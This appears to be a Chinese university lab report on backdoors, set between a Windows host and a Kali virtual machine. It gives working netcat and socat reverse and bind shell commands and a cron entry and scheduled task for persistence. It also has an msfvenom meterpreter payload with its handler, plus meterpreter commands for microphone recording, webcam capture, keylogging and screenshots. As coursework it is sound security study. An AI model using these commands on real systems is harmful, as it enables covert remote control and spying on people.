1. 程式人生 > 其它 >Exp2 後門原理與實踐

Exp2 後門原理與實踐

Exp2 後門原理實驗內容

一、實踐目標

  • 使用netcat實現win,kali間的後門連線
  • 使用socat實現win,kali間的後門連線
  • meterpreter的應用

二、基礎知識問答

(1)例舉你能想到的一個後門進入到你係統中的可能方式?

在非官方網站上下載了病毒軟體;
點選不安全網頁連結;
使用未知風險的U盤。

(2)例舉你知道的後門如何啟動起來(win及linux)的方式?

修改linux的cron程式、注入shellcode、網路協議捆綁、社會工程學。

(3)Meterpreter有哪些給你映像深刻的功能?

錄音,錄影,螢幕截圖,獲取擊鍵記錄。

(4)如何發現自己有系統有沒有被安裝後門?

防毒軟體及防火牆反饋,還可以在終端中通過netstat命令檢視有無異常開放的埠,定期檢查是否有未知自啟動項。

三、實驗內容

1.使用netcat獲取主機操作Shell,cron啟動

1 Windows獲取Kali虛擬機器的shell

1.檢視Windows主機的IP地址
ipconfig
2.在ncat.exe目錄下開啟cmd監聽本機的1305埠
ncat.exe -l -p 1305
3.kali反彈連線Windows
nc 192.168.133.222 1305 -e /bin/sh
4.Windows返回kali的shell
ls

2 Kali虛擬機器獲取Windows的shell

1.獲取Kali虛擬機器的IP地址
2.Kali中開啟監聽
ncat -l -p 1305
3.Windows反彈連線
ncat.exe -e cmd.exe 192.168.37.130 1305
4.Kali虛擬機器返回Windows的shell
dir

3 cron啟動

1.Kali中執行crontab -e指令
crontab -e
2.設定自啟動時間
40-55 * * * * /bin/netcat 192.168.133.222 1305 -e /bin/sh


則當主機時間為每小時的40-55分,若存在一臺ip地址為 192.168.37.130的主機正在監聽1305埠,該主機便可以獲取到Kali的Shell

3.Windows主機在指定時間監聽
ncat.exe -l -p 1305

2.使用socat獲取主機操作Shell, 任務計劃啟動

1 Windows獲取kali虛擬機器的shell

1.Kali開放1305埠
socat tcp-listen:1305 system:bash,pty,stderr
2.Windows連線Kali虛擬機器,驗證shell功能
socat - tcp:192.168.133.222:1305

2 Kali虛擬機器獲得Windows的shell

1.Windows開放1305埠
socat tcp-listen:1305 exec:cmd,pty,stderr
2.Kali虛擬機器連線Windows
socat - tcp:192.168.133.222:1305

3 任務計劃啟動

1.開啟任務計劃程式,單擊建立任務,編輯名稱
2.新建操作,新建觸發器,將socat.exe所在位置填入並新增以下引數,其他選項不變
3.測試
socat - tcp:192.168.133.222:1305

3.使用MSF meterpreter生成可執行檔案,利用ncat傳送到主機並執行獲取主機Shell

1 生成可執行檔案

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.133.222 LPORT=1305 -f exe > shell.exe

2 利用ncat傳送到主機並執行獲取主機Shell

1.在Windows的cmd下開始監聽1305埠
ncat.exe -l 1305 > shell.exe
2.Kali虛擬機器傳送shell.exe
nc 192.168.133.222 1305 < shell.exe
3.msf開啟監聽
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.37.130
set LPORT 1305
4.在Windows中開啟shell.exe
5.獲取主機shell
exploit

4.使用MSF meterpreter獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權

1 獲取目標主機音訊

MSF exploit中輸入record_mic指令進行錄音,-d可設定時長

2 獲取目標主機攝像頭

webcam_snap

3 獲取擊鍵記錄

keyscan_start開始捕獲鍵盤記錄,keyscan_dump獲取擊鍵記錄,-d可設定時長

4 擷取主機螢幕

screenshot

實驗體會:

本次實驗中通過對後門概念的理解和實際操作,掌握了後門的生成過程和注入方式,明白了後門其實就是留在計算機系統中,繞過了安全檢測可以用某種方式控制計算機系統的途徑。
實驗中對ip比較模糊,經常不知道選擇主機IP還是虛擬機器IP,生成攻擊檔案ip用來傳遞引數,返回攻擊者的電腦,用來連線的nc的ip為對方ip。另外,防火牆和防毒軟體多次阻止實驗中斷,也切實感受到了後門的工作原理、防火牆和防毒軟體的重要性。
對於不明網站上的軟體下載和不安全連結以後會多多警惕。